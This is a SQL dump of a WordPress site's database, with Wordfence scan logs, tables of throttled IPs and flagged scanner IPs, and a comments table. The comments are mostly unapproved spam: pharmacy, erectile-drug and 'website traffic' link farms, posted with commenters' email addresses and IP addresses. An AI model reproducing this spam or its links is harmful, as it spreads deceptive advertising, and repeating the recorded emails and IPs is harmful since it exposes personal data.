(117903, 1492265529.906968, 2, 'info', 'Analyzed 1100 files containing 15.03 MB of data so far'),
(117064, 1491750769.532131, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117063, 1491750769.531784, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117062, 1491750769.531340, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117819, 1492193120.926257, 2, 'info', 'Analyzed 1600 files containing 23.75 MB of data so far'),
(117820, 1492193121.593978, 2, 'info', 'Analyzed 1700 files containing 24.51 MB of data so far'),
(117821, 1492193122.595042, 2, 'info', 'Analyzed 1800 files containing 27.97 MB of data so far'),
(117822, 1492193123.775098, 2, 'info', 'Analyzed 1900 files containing 30.52 MB of data so far'),
(117880, 1492265522.310195, 1, 'info', 'Contacting Wordfence to initiate scan'),
(117747, 1492108248.385805, 2, 'info', 'Scanned contents of 56 additional files at 18.35 per second'),
(117823, 1492193124.016753, 2, 'info', 'Analyzed 2000 files containing 32.64 MB of data so far'),
(117303, 1491886410.891745, 2, 'info', 'Scanned contents of 39 additional files at 18.30 per second'),
(117304, 1491886411.856837, 2, 'info', 'Scanned contents of 86 additional files at 27.78 per second'),
(117305, 1491886411.857229, 2, 'info', 'Asking Wordfence to check URL\'s against malware list.'),
(117306, 1491886411.858247, 2, 'info', 'Checking 59 host keys against Wordfence scanning servers.'),
(117307, 1491886412.712643, 2, 'info', 'Done host key check.'),
(117308, 1491886412.714655, 2, 'info', 'Checking 1 URLs from 1 sources.'),
(117309, 1491886413.590731, 2, 'info', 'Done URL check.'),
(117310, 1491886413.607520, 2, 'info', 'Done file contents scan'),
(117744, 1492108245.332862, 2, 'info', 'Starting scan of file contents'),
(118209, 1492320260.797986, 10, 'info', 'SUM_ENDOK:Scanning for weak passwords'),
(118208, 1492320259.648499, 2, 'info', 'Starting password strength check on 3 users.'),
(117929, 1492265541.056105, 2, 'info', 'Checking 1 URLs from 1 sources.'),
(117930, 1492265541.933528, 2, 'info', 'Done URL check.'),
(118006, 1492280425.084668, 10, 'info', 'SUM_ENDOK:Comparing core WordPress files against originals in repository'),
(118005, 1492280425.082622, 2, 'info', 'Analyzed 2411 files containing 37.68 MB of data.'),
(117337, 1491886416.197572, 1, 'info', 'Scan Complete. Scanned 2411 files, 14 plugins, 4 themes, 11 pages, 145 comments and 43639 records in 33 seconds.'),
(117635, 1492072412.242743, 2, 'info', 'Analyzed 1000 files containing 13.31 MB of data so far'),
(118168, 1492320248.561467, 2, 'info', 'Analyzed 1100 files containing 15.03 MB of data so far'),
(117809, 1492193117.391797, 2, 'info', 'Analyzed 600 files containing 6.21 MB of data so far'),
(117810, 1492193117.700719, 2, 'info', 'Analyzed 700 files containing 7.41 MB of data so far'),
(117811, 1492193118.150278, 2, 'info', 'Analyzed 800 files containing 10.45 MB of data so far'),
(117812, 1492193118.559895, 2, 'info', 'Analyzed 900 files containing 12.89 MB of data so far'),
(118167, 1492320248.285222, 2, 'info', 'Analyzed 1000 files containing 13.31 MB of data so far'),
(118034, 1492280433.174121, 10, 'info', 'SUM_START:Scanning DNS for unauthorized changes'),
(117206, 1491821934.793681, 2, 'info', 'Analyzed 2400 files containing 37.51 MB of data so far'),
(118067, 1492290929.982592, 10, 'info', 'SUM_DISABLED:Skipping theme scan'),
(118033, 1492280433.165086, 10, 'info', 'SUM_ENDOK:Scanning for weak passwords'),
(117537, 1492058773.211522, 2, 'info', 'Analyzed 100 files containing 1.02 MB of data so far'),
(117207, 1491821934.849188, 2, 'info', 'Analyzed 2411 files containing 37.68 MB of data.'),
(117543, 1492058774.852590, 2, 'info', 'Analyzed 700 files containing 7.41 MB of data so far'),
(117542, 1492058774.531758, 2, 'info', 'Analyzed 600 files containing 6.21 MB of data so far'),
(118068, 1492290929.983145, 10, 'info', 'SUM_DISABLED:Skipping plugin scan'),
(118069, 1492290929.988825, 10, 'info', 'SUM_START:Scanning for known malware files'),
(118070, 1492290930.150517, 2, 'info', 'Analyzed 100 files containing 1.02 MB of data so far'),
(118071, 1492290930.322597, 2, 'info', 'Analyzed 200 files containing 2.51 MB of data so far'),
(118072, 1492290930.484467, 2, 'info', 'Analyzed 300 files containing 3.26 MB of data so far'),
(118073, 1492290930.632957, 2, 'info', 'Analyzed 400 files containing 3.97 MB of data so far'),
(118074, 1492290930.794693, 2, 'info', 'Analyzed 500 files containing 4.95 MB of data so far'),
(118075, 1492290930.942165, 2, 'info', 'Analyzed 600 files containing 6.21 MB of data so far'),
(118076, 1492290931.103734, 2, 'info', 'Analyzed 700 files containing 7.41 MB of data so far'),
(118077, 1492290931.355899, 2, 'info', 'Analyzed 800 files containing 10.45 MB of data so far'),
(118078, 1492290931.571112, 2, 'info', 'Analyzed 900 files containing 12.89 MB of data so far'),
(118079, 1492290931.749529, 2, 'info', 'Analyzed 1000 files containing 13.31 MB of data so far'),
(118080, 1492290931.991039, 2, 'info', 'Analyzed 1100 files containing 15.03 MB of data so far'),
(118081, 1492290932.156280, 2, 'info', 'Analyzed 1200 files containing 16.57 MB of data so far'),
(118082, 1492290932.398992, 2, 'info', 'Analyzed 1300 files containing 21.78 MB of data so far'),
(118083, 1492290932.552849, 2, 'info', 'Analyzed 1400 files containing 22.37 MB of data so far'),
(118084, 1492290932.671374, 2, 'info', 'Analyzed 1500 files containing 22.67 MB of data so far'),
(117483, 1491988777.619980, 2, 'info', 'Checking 59 host keys against Wordfence scanning servers.'),
(117482, 1491988777.618677, 2, 'info', 'Asking Wordfence to check URL\'s against malware list.'),
(117780, 1492108252.943672, 1, 'info', '-------------------'),
(117219, 1491821939.856259, 2, 'info', 'Done host key check.'),
(117291, 1491886406.619184, 2, 'info', 'Analyzed 2000 files containing 32.64 MB of data so far'),
(117292, 1491886406.875923, 2, 'info', 'Analyzed 2100 files containing 33.38 MB of data so far'),
(117293, 1491886407.266508, 2, 'info', 'Analyzed 2200 files containing 34.49 MB of data so far'),
(117924, 1492265539.187627, 2, 'info', 'Scanned contents of 39 additional files at 18.18 per second'),
(118191, 1492320256.881443, 2, 'info', 'Asking Wordfence to check URL\'s against malware list.'),
(118190, 1492320256.879894, 2, 'info', 'Scanned contents of 86 additional files at 29.29 per second'),
(118189, 1492320255.987609, 2, 'info', 'Scanned contents of 41 additional files at 20.06 per second'),
(118188, 1492320254.983074, 2, 'info', 'Scanned contents of 28 additional files at 26.94 per second'),
(118187, 1492320253.943182, 2, 'info', 'Starting scan of file contents'),
(118186, 1492320253.046651, 10, 'info', 'SUM_START:Scanning files for URLs in Google\'s Safe Browsing List'),
(118185, 1492320253.041850, 10, 'info', 'SUM_START:Scanning file contents for infections and vulnerabilities'),
(118184, 1492320253.013817, 10, 'info', 'SUM_ENDOK:Scanning for known malware files'),
(118183, 1492320253.011604, 10, 'info', 'SUM_ENDOK:Comparing core WordPress files against originals in repository'),
(118182, 1492320253.010510, 2, 'info', 'Analyzed 2411 files containing 37.68 MB of data.'),
(118181, 1492320252.982623, 2, 'info', 'Analyzed 2400 files containing 37.51 MB of data so far'),
(118180, 1492320252.660807, 2, 'info', 'Analyzed 2300 files containing 34.88 MB of data so far'),
(118179, 1492320252.421174, 2, 'info', 'Analyzed 2200 files containing 34.49 MB of data so far'),
(118178, 1492320252.115644, 2, 'info', 'Analyzed 2100 files containing 33.38 MB of data so far'),
(116950, 1491702317.190081, 2, 'info', 'Scanned contents of 87 additional files at 29.60 per second'),
(116951, 1491702317.193297, 2, 'info', 'Asking Wordfence to check URL\'s against malware list.'),
(117547, 1492058776.321400, 2, 'info', 'Analyzed 1100 files containing 15.03 MB of data so far'),
(117548, 1492058776.783869, 2, 'info', 'Analyzed 1200 files containing 16.57 MB of data so far'),
(117549, 1492058777.076834, 2, 'info', 'Analyzed 1300 files containing 21.78 MB of data so far'),
(117550, 1492058777.236704, 2, 'info', 'Analyzed 1400 files containing 22.37 MB of data so far'),
(117551, 1492058777.449628, 2, 'info', 'Analyzed 1500 files containing 22.67 MB of data so far'),
(117552, 1492058777.747064, 2, 'info', 'Analyzed 1600 files containing 23.75 MB of data so far'),
(117553, 1492058778.070060, 2, 'info', 'Analyzed 1700 files containing 24.51 MB of data so far'),
(117554, 1492058778.951874, 2, 'info', 'Analyzed 1800 files containing 27.97 MB of data so far'),
(117555, 1492058780.683030, 2, 'info', 'Analyzed 1900 files containing 30.52 MB of data so far'),
(117556, 1492058781.174504, 2, 'info', 'Analyzed 2000 files containing 32.64 MB of data so far'),
(117557, 1492058781.382291, 2, 'info', 'Analyzed 2100 files containing 33.38 MB of data so far'),
(117558, 1492058781.790771, 2, 'info', 'Analyzed 2200 files containing 34.49 MB of data so far'),
(117074, 1491767380.193700, 1, 'info', 'Scheduled Wordfence scan starting at Sunday 9th of April 2017 07:49:40 PM'),
(117632, 1492072411.726452, 2, 'info', 'Analyzed 700 files containing 7.41 MB of data so far'),
(117633, 1492072411.927832, 2, 'info', 'Analyzed 800 files containing 10.45 MB of data so far'),
(118054, 1492290919.294364, 10, 'info', 'SUM_PAIDONLY:Checking if your IP is generating spam is for paid members only'),
(117516, 1491988782.040066, 2, 'info', 'Wordfence used 56.53MB of memory for scan. Server peak memory usage was: 72.28MB'),
(118227, 1493013113.164845, 2, 'info', 'Checking 6 host keys against Wordfence scanning servers.'),
(118228, 1493013114.066445, 2, 'info', 'Done host key check.'),
(118229, 1493013114.081588, 2, 'info', 'Scanned comment with Author: Elisa Brown Email: leyswgiuz@mrflazu.com Source IP: 81.171.97.125 '),
(117694, 1492072423.958439, 2, 'info', 'Wordfence used 56.53MB of memory for scan. Server peak memory usage was: 72.28MB'),
(117808, 1492193117.074159, 2, 'info', 'Analyzed 500 files containing 4.95 MB of data so far'),
(117448, 1491988761.650291, 2, 'info', 'Analyzed 100 files containing 1.02 MB of data so far'),
(117403, 1491943545.677182, 2, 'info', 'Checking 6 host keys against Wordfence scanning servers.');

-- --------------------------------------------------------

--
-- Structure de la table `wp_wfThrottleLog`
--

CREATE TABLE `wp_wfThrottleLog` (
  `IP` int(10) UNSIGNED NOT NULL,
  `startTime` int(10) UNSIGNED NOT NULL,
  `endTime` int(10) UNSIGNED NOT NULL,
  `timesThrottled` int(10) UNSIGNED NOT NULL,
  `lastReason` varchar(255) NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `wp_wfThrottleLog`
--

INSERT INTO `wp_wfThrottleLog` (`IP`, `startTime`, `endTime`, `timesThrottled`, `lastReason`) VALUES
(1153176390, 1445127994, 1445127994, 1, 'Exceeded the maximum number of page not found errors per minute for a crawler.');

-- --------------------------------------------------------

--
-- Structure de la table `wp_wfVulnScanners`
--

CREATE TABLE `wp_wfVulnScanners` (
  `IP` int(10) UNSIGNED NOT NULL,
  `ctime` int(10) UNSIGNED NOT NULL,
  `hits` int(10) UNSIGNED NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `wp_wfVulnScanners`
--

INSERT INTO `wp_wfVulnScanners` (`IP`, `ctime`, `hits`) VALUES
(3639891306, 1493024963, 1),
(1247482290, 1494369707, 2),
(844599434, 1496262052, 10),
(3233508538, 1497512350, 1);

-- --------------------------------------------------------

--
-- Structure de la table `www2_commentmeta`
--

CREATE TABLE `www2_commentmeta` (
  `meta_id` bigint(20) UNSIGNED NOT NULL,
  `comment_id` bigint(20) UNSIGNED NOT NULL DEFAULT '0',
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Structure de la table `www2_comments`
--

CREATE TABLE `www2_comments` (
  `comment_ID` bigint(20) UNSIGNED NOT NULL,
  `comment_post_ID` bigint(20) UNSIGNED NOT NULL DEFAULT '0',
  `comment_author` tinytext NOT NULL,
  `comment_author_email` varchar(100) NOT NULL DEFAULT '',
  `comment_author_url` varchar(200) NOT NULL DEFAULT '',
  `comment_author_IP` varchar(100) NOT NULL DEFAULT '',
  `comment_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_content` text NOT NULL,
  `comment_karma` int(11) NOT NULL DEFAULT '0',
  `comment_approved` varchar(20) NOT NULL DEFAULT '1',
  `comment_agent` varchar(255) NOT NULL DEFAULT '',
  `comment_type` varchar(20) NOT NULL DEFAULT '',
  `comment_parent` bigint(20) UNSIGNED NOT NULL DEFAULT '0',
  `user_id` bigint(20) UNSIGNED NOT NULL DEFAULT '0'
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `www2_comments`
--

INSERT INTO `www2_comments` (`comment_ID`, `comment_post_ID`, `comment_author`, `comment_author_email`, `comment_author_url`, `comment_author_IP`, `comment_date`, `comment_date_gmt`, `comment_content`, `comment_karma`, `comment_approved`, `comment_agent`, `comment_type`, `comment_parent`, `user_id`) VALUES
(24, 1, 'Aevineeundurge', 'quohjaimai@fastmailforyou.net', 'http://americanwoodworker.com/blogs/judithtildam/pages/ginkgo-biloba-premature-ejaculation-how-long-is-a-man-supposed-to-last-in-bed-how-to-make-a-woman-last-longer-in-bed-how-to-help-a-guy-last-longe', '31.184.241.12', '2013-11-29 04:36:14', '2013-11-29 04:36:14', 'premature ejaculation while sleeping  <a href=\"http://joomlacode.org/gf/download/trackeritem/32712/122480/file80.html\" rel=\"nofollow\">how to last longer in missionary</a>  skuteczniej edetty  <a href=\"http://r-forge.r-project.org/tracker/download.php/103/458/5053/1927/causes-and-treatment-of-premature-ejaculation-how-to-last-really-long-in-bed-how-to-last-really-long-in-bed-for-men-meaning-of-premature-ejaculation-emla-cream-premature-ejaculation\" rel=\"nofollow\">meaning of premature ejaculation</a>  why do macs last longer than pcs  <a href=\"http://bleacherreport.com/users/3324026-do-older-men-last-longer\" rel=\"nofollow\">do older men last longer</a>  danida toolcenter  <a href=\"http://bleacherreport.com/users/3323966-how-to-fight-premature-ejaculation\" rel=\"nofollow\">solutions to premature ejaculation</a>  tocmoe proiectul  <a href=\"http://bleacherreport.com/users/3324785-how-to-delay-ejaculation-in-men-how-to-delay-ejaculation-in-men-naturally\" rel=\"nofollow\">is premature ejaculation genetic</a>  vater orasului beplankte  <a href=\"http://r-forge.r-project.org/tracker/download.php/103/458/5054/1930/problem-of-premature-ejaculation-ginger-and-premature-ejaculation-how-to-fix-premature-ejaculation-viagra-and-premature-ejaculation-viagra-for-premature-ejaculation\" rel=\"nofollow\">viagra for premature ejaculation</a>  breathing to prevent premature ejaculation do u last longer with condom on how to make your guy last longer in bed  <a href=\"http://joomlacode.org/gf/download/trackeritem/32712/122482/file78.html\" rel=\"nofollow\">how to last longer during intercourse for men</a>  monthly ruabookprint denigrazioni  <a href=\"http://r-forge.r-project.org/tracker/download.php/103/458/5046/1894/pills-for-men-to-last-longer-in-bed-how-can-a-man-stop-premature-ejaculation-what-do-women-think-about-premature-ejaculation-im-16-how-can-i-last-longer-in-bed-how-can-my-boyfriend-last-longer-in-bed\" rel=\"nofollow\">pills for men to last longer in bed</a>  prutului vezetokent renovar  <a href=\"http://r-forge.r-project.org/tracker/download.php/103/458/5058/1947/tricks-to-last-longer-sexually-exercise-to-stop-premature-ejaculation-best-way-to-stop-premature-ejaculation-does-viagra-stop-premature-ejaculation-how-can-you-stop-premature-ejaculation\" rel=\"nofollow\">does viagra stop premature ejaculation</a>  goculture hughston humr  <a href=\"http://joomlacode.org/gf/download/trackeritem/32706/122415/file16.html\" rel=\"nofollow\">pills for premature ejaculation in india</a>  bhawna feudal menutd  <a href=\"http://bleacherreport.com/users/3324026-do-older-men-last-longer\" rel=\"nofollow\">do black men last longer in bed</a>  rion opmerkelijke zarry  <a href=\"http://joomlacode.org/gf/download/trackeritem/32707/122433/file21.html\" rel=\"nofollow\">how to use kegel muscles to last longer</a>  \r\noldoklest modulares  <a href=\"http://www.tholos.biz/contatti.html\" rel=\"nofollow\">bundleslow beifeld </a>  chorfest cproc  <a href=\"http://gimnasium1.ax3.net/forum/posting.php?mode=post&amp;f=2\" rel=\"nofollow\">submarines usseglio </a>', 0, '0', 'Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.11', '', 0, 0),
(25, 1, 'Ractstums', 'dihufoforaxi@nokiamail.com', '', '5.29.35.42', '2013-12-01 21:33:39', '2013-12-01 21:33:39', 'Nice man \r\n \r\n \r\n<a href=\"http://flavors.me/elmoredtc507\" rel=\"nofollow\">??????</a> \r\n<a href=\"http://flavors.me/zachariasmcd527\" rel=\"nofollow\">??????</a> \r\n<a href=\"http://flavors.me/carylbbz354\" rel=\"nofollow\">??????</a> \r\n<a href=\"http://flavors.me/aubriefby619\" rel=\"nofollow\">??????</a> \r\n<a href=\"http://flavors.me/orsontds763\" rel=\"nofollow\">??????</a> \r\n<a href=\"http://flavors.me/agnellapme676\" rel=\"nofollow\">??????</a> \r\n<a href=\"http://flavors.me/gatesrbe672\" rel=\"nofollow\">??????</a> \r\n<a href=\"http://flavors.me/adlerccb583\" rel=\"nofollow\">??????</a> \r\n<a href=\"http://flavors.me/jaquenetteklu208\" rel=\"nofollow\">??????</a> \r\n<a href=\"http://flavors.me/ritchiepfa385\" rel=\"nofollow\">??????</a> \r\n<a href=\"http://flavors.me/audijfb688\" rel=\"nofollow\">??????</a> \r\n<a href=\"http://flavors.me/jasonnbj222\" rel=\"nofollow\">??????</a> \r\n \r\nLesya2222sc', 0, '0', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; MRA 6.0 (build 6005); User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1); .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath', '', 0, 0),
(26, 1, 'Realallonry', 'miha@mail.ru', 'http://www.wow-level.ru', '178.151.216.52', '2013-12-02 08:54:43', '2013-12-02 08:54:43', 'Deniskrav \r\n \r\n<a href=\"http://passrealthestner70.webix.me\" rel=\"nofollow\">איך מפסיקים לעשן</a> \r\n<a href=\"http://bronectoimuf75.webix.me\" rel=\"nofollow\">הדרך הקלה להפסיק לעשן</a> \r\n<a href=\"http://chedistmongma87.webix.me\" rel=\"nofollow\">להפסיק לעשן</a> \r\n<a href=\"http://samrihelcapp64.webix.me\" rel=\"nofollow\">הפסקת עישון</a> \r\n<a href=\"http://tenranomoons67.webix.me\" rel=\"nofollow\">הפסקת עישון</a> \r\n<a href=\"http://gaisichestfor52.webix.me\" rel=\"nofollow\">גמילה מניקוטין</a> \r\n<a href=\"http://siotomosu83.webix.me\" rel=\"nofollow\">זריקה להפסקת עישון</a> \r\n<a href=\"http://pantgendheadsa62.webix.me\" rel=\"nofollow\">כדורים להפסקת עישון</a> \r\n<a href=\"http://jarlouronme65.webix.me\" rel=\"nofollow\">גמילה מסיגריות</a> \r\n<a href=\"http://himoselhand53.webix.me\" rel=\"nofollow\">גמילה מסיגריות</a> \r\n<a href=\"http://jackchapsstercom77.webix.me\" rel=\"nofollow\">להפסיק לעשן</a>', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0', '', 0, 0),
(27, 1, 'Ractstums', 'dihufoforaxi@nokiamail.com', '', '5.29.35.42', '2013-12-02 23:27:50', '2013-12-02 23:27:50', 'Nice man \r\n \r\n<a href=\"http://flavors.me/charissacts263\" rel=\"nofollow\">לויטרה</a> \r\n<a href=\"http://flavors.me/nonnahgtw296\" rel=\"nofollow\">גלולות ללא מרשם</a> \r\n<a href=\"http://flavors.me/clowmt280\" rel=\"nofollow\">קניית ויאגרה</a> \r\n<a href=\"http://flavors.me/sabawux511\" rel=\"nofollow\">לויטרה</a> \r\n<a href=\"http://flavors.me/cyntheahdr521\" rel=\"nofollow\">ויאגרה מחיר</a> \r\n<a href=\"http://flavors.me/suzanneyqt626\" rel=\"nofollow\">קניית ויאגרה</a> \r\n<a href=\"http://flavors.me/orsolabqi744\" rel=\"nofollow\">לויטרה</a> \r\n<a href=\"http://flavors.me/grangeuzu562\" rel=\"nofollow\">ויאגרה לנשים</a> \r\n<a href=\"http://flavors.me/bartolomeoedz210\" rel=\"nofollow\">לויטרה</a> \r\n<a href=\"http://flavors.me/alvisefl932\" rel=\"nofollow\">קניית ויאגרה</a> \r\n<a href=\"http://flavors.me/silvanusvwh128\" rel=\"nofollow\">לויטרה</a> \r\n<a href=\"http://flavors.me/drugio709\" rel=\"nofollow\">לויטרה</a> \r\n<a href=\"http://flavors.me/grayaxw078\" rel=\"nofollow\">שיפור התפקוד המיני</a> \r\n<a href=\"http://flavors.me/gregoriouxx914\" rel=\"nofollow\">סיאליס</a> \r\n<a href=\"http://flavors.me/geniaphd119\" rel=\"nofollow\">ויאגרה טבעית</a> \r\n<a href=\"http://flavors.me/korryyav418\" rel=\"nofollow\">ויאגרה טבעית</a> \r\n<a href=\"http://flavors.me/verineuev550\" rel=\"nofollow\">קניית ויאגרה</a> \r\n<a href=\"http://flavors.me/reiderffd277\" rel=\"nofollow\">ויאגרה טבעית</a> \r\n<a href=\"http://flavors.me/emmeryjmd330\" rel=\"nofollow\">סיאליס</a> \r\n<a href=\"http://flavors.me/tedmundezd457\" rel=\"nofollow\">ויאגרה ללא מרשם</a> \r\n<a href=\"http://flavors.me/nappiezuy694\" rel=\"nofollow\">ויאגרה</a> \r\n<a href=\"http://flavors.me/griffiemww665\" rel=\"nofollow\">ויאגרה טבעית</a> \r\n<a href=\"http://flavors.me/anastasiadxp974\" rel=\"nofollow\">גלולות ללא מרשם</a> \r\n<a href=\"http://flavors.me/sellenll203\" rel=\"nofollow\">ויאגרה טבעית</a> \r\n<a href=\"http://flavors.me/esmariaoko118\" rel=\"nofollow\">סיאליס</a> \r\n<a href=\"http://flavors.me/livydz584\" rel=\"nofollow\">ויאגרה ללא מרשם</a> \r\n<a href=\"http://flavors.me/uriahbby612\" rel=\"nofollow\">ויאגרה למכירה</a> \r\n<a href=\"http://flavors.me/noliedal235\" rel=\"nofollow\">ויאגרה מחיר</a> \r\n<a href=\"http://flavors.me/pierrettetvj985\" rel=\"nofollow\">ויאגרה לנשים</a> \r\n<a href=\"http://flavors.me/timieem853\" rel=\"nofollow\">מרשם לויאגרה</a> \r\n<a href=\"http://flavors.me/bettaquv191\" rel=\"nofollow\">ויאגרה מחיר</a> \r\n<a href=\"http://flavors.me/rollandzpr891\" rel=\"nofollow\">ויאגרה ללא מרשם</a> \r\n<a href=\"http://flavors.me/joelieofr517\" rel=\"nofollow\">ויאגרה ללא מרשם</a> \r\n<a href=\"http://flavors.me/leoinefbi165\" rel=\"nofollow\">ויאגרה ללא מרשם</a> \r\n<a href=\"http://flavors.me/carmellahgz112\" rel=\"nofollow\">ויאגרה מחיר</a> \r\n<a href=\"http://flavors.me/eastonslz716\" rel=\"nofollow\">גלולות ללא מרשם</a> \r\n<a href=\"http://flavors.me/willowfkm846\" rel=\"nofollow\">ויאגרה תופעות לוואי</a> \r\n<a href=\"http://flavors.me/loletaqir656\" rel=\"nofollow\">ויאגרה ללא מרשם</a> \r\n<a href=\"http://flavors.me/tanctq078\" rel=\"nofollow\">ויאגרה מחיר</a> \r\n<a href=\"http://flavors.me/gilwvn635\" rel=\"nofollow\">לויטרה</a> \r\n<a href=\"http://flavors.me/davidezvn963\" rel=\"nofollow\">ויאגרה ללא מרשם</a> \r\n<a href=\"http://flavors.me/melessanyb312\" rel=\"nofollow\">לויטרה</a> \r\n<a href=\"http://flavors.me/brycegnr658\" rel=\"nofollow\">ויאגרה</a> \r\n<a href=\"http://flavors.me/gailexwu214\" rel=\"nofollow\">ויאגרה מחיר</a> \r\n \r\nLesya2222sc', 0, '0', 'Opera/9.80 (Windows NT 6.1; WOW64; Edition Yx) Presto/2.12.388 Version/12.11', '', 0, 0),
(28, 1, 'ulyakovalchuk', 'gripersebounc@gmail.com', 'http://ori.kz', '46.119.115.223', '2013-12-03 22:45:57', '2013-12-03 22:45:57', 'http://ori.kz -  отдых + на островах греции', 0, '0', 'Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.10.289 Version/12.01', '', 0, 0),
(29, 1, 'mocovaGreesee', 'effeveexest@hotmail.com', 'http://www.temnie.asia/?page=MAHABANG+TULA+TUNGKOL+SA+KALUSUGAN', '41.77.1.32', '2013-12-06 23:57:09', '2013-12-06 23:57:09', 'Hartelijk dank , dat verlichten , en vooral, net op tijd . Stel je voor, al zes jaar op het internet , maar ik geloof dat het de eerste keer dat ik het hoor .', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11', '', 0, 0),
(30, 1, 'kamilasadova', 'hvilhvilin@gmail.com', 'http://nextonmarket.kz', '37.115.185.27', '2013-12-13 11:48:56', '2013-12-13 11:48:56', '<a href=\"http://studdom.kz\" rel=\"nofollow\">Визитки высококачественно и по самым доступным ценам</a>', 0, '0', 'Opera/9.80 (Windows NT 6.1; WOW64; MRA 8.0 (build 5784)) Presto/2.12.388 Version/12.10', '', 0, 0),
(31, 1, 'Britt', 'ottsjdvp@gmail.com', 'http://2hams.com/1612p', '151.237.180.10', '2013-12-16 17:29:07', '2013-12-16 17:29:07', 'We have made the decision to open our POWERFUL and PRIVATE website traffic system to the public for just a few days! You can sign up for our UP SCALE network with a free trial as we get started with the public\'s orders. Imagine how your bank account will look when your website gets the traffic it needs. Visit us today: http://2hams.com/1612o', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )', '', 0, 0),
(32, 1, 'Maria', 'ivqpfzsovuu@gmail.com', 'http://2hams.com/1612o', '151.237.177.85', '2013-12-18 14:52:27', '2013-12-18 14:52:27', 'You need targeted traffic to your website so why not try some for free? There is a VERY POWERFUL and POPULAR company out there who now lets you try their website traffic service for 7 days free of charge. I am so glad they opened their traffic system back up to the public! Sign up before it is too late: http://2hams.com/1612n', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )', '', 0, 0),
(33, 1, 'Karen', 'wgirsyzye@gmail.com', 'http://2hams.com/1612u', '151.237.177.85', '2013-12-21 00:48:31', '2013-12-21 00:48:31', 'We have decided to open our POWERFUL and PRIVATE website traffic system to the public for just a few days! You can sign up for our UP SCALE network with a free trial as we get started with the public\'s orders. Imagine how your bank account will look when your website gets the traffic it deserves. Visit us today: http://2hams.com/1612n', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727 ; .NET CLR 4.0.30319)', '', 0, 0),
(34, 1, 'Linda', 'ypqtuza@gmail.com', 'http://2hams.com/1612o', '151.237.177.73', '2013-12-22 14:15:37', '2013-12-22 14:15:37', 'We have decided to open our POWERFUL and PRIVATE website traffic system to the public for a limited time! You can sign up for our UP SCALE network with a free trial as we get started with the public\'s orders. Imagine how your bank account will look when your website gets the traffic it needs. Visit us today: http://2hams.com/1612p', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )', '', 0, 0),
(35, 1, 'sabinakrylova', 'khvolsonkhvols@gmail.com', 'http://prostata.kz', '5.248.83.110', '2013-12-23 12:00:55', '2013-12-23 12:00:55', '<a href=\"http://nevropatolog.kz\" rel=\"nofollow\"> сколиоз грудного отдела упражнения </a>', 0, '0', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.162 Safari/535.19', '', 0, 0),
(36, 1, 'Stacey', 'mgitremp@gmail.com', 'http://2hams.com/2312h', '151.237.180.11', '2013-12-24 08:45:25', '2013-12-24 08:45:25', 'We have decided to open our POWERFUL and PRIVATE website traffic system to the public for just a few days! You can sign up for our UP SCALE network with a free trial as we get started with the public\'s orders. Imagine how your bank account will look when your website gets the traffic it needs. Visit us today: http://2hams.com/2312o', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', '', 0, 0),
(18, 1, 'TMHCPPC', 'lomavloff1979@hotmail.com', 'http://tiohydjust.soup.io/#725', '178.151.216.88', '2013-10-27 21:07:15', '2013-10-27 21:07:15', 'order amoxicillin\r\ni want to buy amoxicillin\r\norder amoxicillin from canada\r\nbuy amoxil 500mg\r\n \r\nhttp://runloli.soup.io/#18605 \r\nhttp://haucocpi.soup.io/#3871 \r\nhttp://tiohydjust.soup.io/#1649,  buy cheap amoxil online \r\namoxicillin 875 mg buy\r\nbuy generic amoxil\r\nwhere to buy amoxicillin antibiotic\r\nbuy amoxicillin clavulanate\r\nbuy amoxicillin in spain\r\nbuy amoxil online canada\r\nbuy amoxicillin for toothache\r\nbuy amoxicillin australia', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0', '', 0, 0),
